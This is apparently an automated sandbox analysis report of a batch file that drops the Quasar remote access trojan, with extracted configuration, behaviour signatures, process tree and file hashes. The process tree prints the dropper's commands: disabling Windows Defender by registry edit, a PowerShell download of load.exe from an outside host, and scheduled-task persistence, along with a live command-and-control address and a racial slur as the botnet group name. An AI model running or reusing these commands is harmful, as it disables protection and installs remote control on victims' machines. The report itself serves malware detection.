Analysis
-
max time kernel
51s -
max time network
52s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-12-2024 17:26
Static task
static1
Behavioral task
behavioral1
Sample
FUDRAT___Obfuscated.bat
Resource
win7-20240729-en
Errors
General
-
Target
FUDRAT___Obfuscated.bat
-
Size
463B
-
MD5
a9fdda2577ff67660be21d0d4cd98179
-
SHA1
15432871fed4cbb19ec26eaabcc6b193beebbbfb
-
SHA256
8f18705cf5653667888ea5f2440e984d22c5207e7e5e2fccb68e7ad71f58bb83
-
SHA512
0f43e8b47bdd9d1a2ce65db49868f7698b83bcb5f8d249a29078793e5ca48d75bf8ce99dae00f772c28b766ac761040c0113d9034e7e7d35efb75b39eca5153d
Malware Config
Extracted
https://whatsabool.online/kingvonpiracyvirus/load.exe
Extracted
quasar
1.4.1
Dumb Niggas
85.209.133.15:111
95ddd19c-037b-4e62-8c64-298b31d663b8
-
encryption_key
04FB780AC53244A8569349610FCC9CFEE3EEB90D
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
system
-
subdirectory
SubDir
Signatures
-
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/files/0x0009000000023c6b-18.dat family_quasar behavioral2/memory/1912-21-0x0000000000920000-0x0000000000C42000-memory.dmp family_quasar -
Blocklisted process makes network request 1 IoCs
flow pid Process 8 212 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 1912 load.exe 3284 Client.exe -
pid Process 212 powershell.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "59" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1948 schtasks.exe 4808 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 212 powershell.exe 212 powershell.exe 1600 msedge.exe 1600 msedge.exe 1992 msedge.exe 1992 msedge.exe 1872 identity_helper.exe 1872 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 212 powershell.exe Token: SeDebugPrivilege 1912 load.exe Token: SeDebugPrivilege 3284 Client.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe 1992 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3284 Client.exe 2088 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3352 wrote to memory of 1996 3352 cmd.exe 84 PID 3352 wrote to memory of 1996 3352 cmd.exe 84 PID 3352 wrote to memory of 212 3352 cmd.exe 85 PID 3352 wrote to memory of 212 3352 cmd.exe 85 PID 3352 wrote to memory of 1912 3352 cmd.exe 86 PID 3352 wrote to memory of 1912 3352 cmd.exe 86 PID 1912 wrote to memory of 1948 1912 load.exe 87 PID 1912 wrote to memory of 1948 1912 load.exe 87 PID 1912 wrote to memory of 3284 1912 load.exe 89 PID 1912 wrote to memory of 3284 1912 load.exe 89 PID 3284 wrote to memory of 4808 3284 Client.exe 90 PID 3284 wrote to memory of 4808 3284 Client.exe 90 PID 1992 wrote to memory of 2504 1992 msedge.exe 108 PID 1992 wrote to memory of 2504 1992 msedge.exe 108 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 3304 1992 msedge.exe 109 PID 1992 wrote to memory of 1600 1992 msedge.exe 110 PID 1992 wrote to memory of 1600 1992 msedge.exe 110 PID 1992 wrote to memory of 2976 1992 msedge.exe 111 PID 1992 wrote to memory of 2976 1992 msedge.exe 111 PID 1992 wrote to memory of 2976 1992 msedge.exe 111 PID 1992 wrote to memory of 2976 1992 msedge.exe 111 PID 1992 wrote to memory of 2976 1992 msedge.exe 111 PID 1992 wrote to memory of 2976 1992 msedge.exe 111 PID 1992 wrote to memory of 2976 1992 msedge.exe 111 PID 1992 wrote to memory of 2976 1992 msedge.exe 111 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FUDRAT___Obfuscated.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:1996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://whatsabool.online/kingvonpiracyvirus/load.exe', 'C:\Users\Admin\AppData\Local\Temp\load.exe')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:212
-
-
C:\Users\Admin\AppData\Local\Temp\load.exe"C:\Users\Admin\AppData\Local\Temp\load.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "system" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:1948
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3284 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "system" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4808
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffda9246f8,0x7fffda924708,0x7fffda9247182⤵PID:2504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,5141313002936985579,16392284805660044463,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:22⤵PID:3304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,5141313002936985579,16392284805660044463,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,5141313002936985579,16392284805660044463,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:82⤵PID:2976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5141313002936985579,16392284805660044463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:12⤵PID:3644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5141313002936985579,16392284805660044463,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:12⤵PID:368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5141313002936985579,16392284805660044463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:12⤵PID:4336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5141313002936985579,16392284805660044463,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4492 /prefetch:12⤵PID:1852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,5141313002936985579,16392284805660044463,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3656 /prefetch:82⤵PID:1028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,5141313002936985579,16392284805660044463,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3656 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5141313002936985579,16392284805660044463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:12⤵PID:1028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5141313002936985579,16392284805660044463,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:12⤵PID:4348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5141313002936985579,16392284805660044463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:12⤵PID:3132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5141313002936985579,16392284805660044463,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:12⤵PID:4844
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4112
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1148
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa38fd055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2088
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD57de1bbdc1f9cf1a58ae1de4951ce8cb9
SHA1010da169e15457c25bd80ef02d76a940c1210301
SHA2566e390bbc0d03a652516705775e8e9a7b7936312a8a5bea407f9d7d9fa99d957e
SHA512e4a33f2128883e71ab41e803e8b55d0ac17cbc51be3bde42bed157df24f10f34ad264f74ef3254dbe30d253aca03158fde21518c2b78aaa05dae8308b1c5f30c
-
Filesize
152B
MD585ba073d7015b6ce7da19235a275f6da
SHA1a23c8c2125e45a0788bac14423ae1f3eab92cf00
SHA2565ad04b8c19bf43b550ad725202f79086168ecccabe791100fba203d9aa27e617
SHA512eb4fd72d7030ea1a25af2b59769b671a5760735fb95d18145f036a8d9e6f42c903b34a7e606046c740c644fab0bb9f5b7335c1869b098f121579e71f10f5a9c3
-
Filesize
180B
MD500a455d9d155394bfb4b52258c97c5e5
SHA12761d0c955353e1982a588a3df78f2744cfaa9df
SHA25645a13c77403533b12fbeeeb580e1c32400ca17a32e15caa8c8e6a180ece27fed
SHA5129553f8553332afbb1b4d5229bbf58aed7a51571ab45cbf01852b36c437811befcbc86f80ec422f222963fa7dabb04b0c9ae72e9d4ff2eeb1e58cde894fbe234f
-
Filesize
5KB
MD5a55c1186b44c92bc7ebfe58f9940a2ee
SHA14f829d6cbc582d259182067e50fd70c245ac1c43
SHA256a242462a641566ab980ea78e3814948e5264ed9be06fc4a14cbe9053e7d4bfb8
SHA512b450ecc05cab90686d18ac631afde7f2ca8073ccedd140e89437a73bbc4d133739edf9e5c8418425f115cd68f9c60712c184c119004bc5b4c4b7889a701725d5
-
Filesize
6KB
MD575782f66e1e370aeeb6cfe5d3242d4f5
SHA149bf6aa0bdf91d21d108d6ebb4301799c95c0248
SHA2564ccfc76fae10c5230bdbba9c0dcba4a9f4b6f4f1b89eeca7d8478332f0024aa7
SHA512a45d0907a71c92ac6b3eb055f0626119bbcc7f6183e283522fb8b44963263a60e3039da9e4a0d5460fd96d2d6a907cca29a028c85f768192fcdf3324a8208b12
-
Filesize
6KB
MD5344bc6efc69375fcc7b47a2e47bde6a4
SHA1296c520cf1bb9bf900b1bd10bfdb93af4862a654
SHA256c5922d9d61c478e320643af857858e5410c0dc4b692771970083a90247eb37ee
SHA512ab1957aa08f12a697b45bf79b4e189f4558d94690b8a16c67f895f48d50b873728ab85b71ed138bb9dca082671f2152c43808ac0d7daa4de97c7515f34113eba
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
10KB
MD526bff5f32ac9184b9cde54d9b5ede214
SHA1fbf657fc0c8518952bde9f351408c0d81afe8656
SHA256aaf79ecb2e33816d0eafb4aaefd495aedbe7eb052701a7ac76b0eed4783462f6
SHA512901fa93240cf9e60ffd8ef8e1b4258ca11421dcf7c473f4f41e5ecaf51531525d7b517e0710507d46b9c498a9c059be5916fbc75b2e6bff8f9ada10ab8d64eea
-
Filesize
10KB
MD582268ada88bdc03eec066b4f0a29495d
SHA1311c64b200643fa826041e77163ade19ce60c0d6
SHA25666d388772ed1d5398a42f9cdc366881190a9fa61cf57893bbe1256485f0dd6e2
SHA51299ef23e2c068f494029874c3af8bfd7a7169a1ecc3ce438c321ea85cb2ca253bb51dfd12d3c03e7772527a1a4e813650429539c7f6929012d88427e35b448e12
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.1MB
MD568b6e948c723b1127c027d2dc9505a13
SHA1e8056196a1ada4f7c266d4d5417d02492b4fbe6e
SHA256cb311e549d10e963d612cefd4fa5ca5d49f0f3b16db3525823e811ec58ec6ebb
SHA512079eb9475d5984a95590387d2ed32fda030785ae1911a1e8a7e7732e3d62e313a88769b96122814a077fb1824424e6f82bcc415e89e7f1d1e981b052a4172761